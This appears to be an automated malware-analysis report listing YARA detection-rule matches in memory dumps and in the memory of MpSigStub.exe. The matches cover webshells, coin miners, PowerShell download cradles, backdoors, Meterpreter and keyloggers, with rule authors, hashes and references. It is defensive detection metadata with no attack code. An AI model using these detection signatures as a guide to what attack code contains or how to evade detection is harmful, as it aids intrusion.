Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.6311853685.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.6337514171.0000028BD6735000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_base64_encoded_payloads date = 2021/01/07, author = Arnim Rupp, description = php webshell containing base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 88d0d4696c9cb2d37d16e330e236cb37cfaec4cd
Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6338346630.0000028BD733C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 00000023.00000003.6296311842.0000028BD60E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.6318490215.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6344793289.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6282034966.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Keylogger_CN_APT date = 2016-03-07, author = Florian Roth, description = Keylogger - generic rule for a Chinese variant, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: WindowsCredentialEditor threat_level = , description = Windows Credential Editor
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: HackTool_Samples description = Hacktool, score =
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
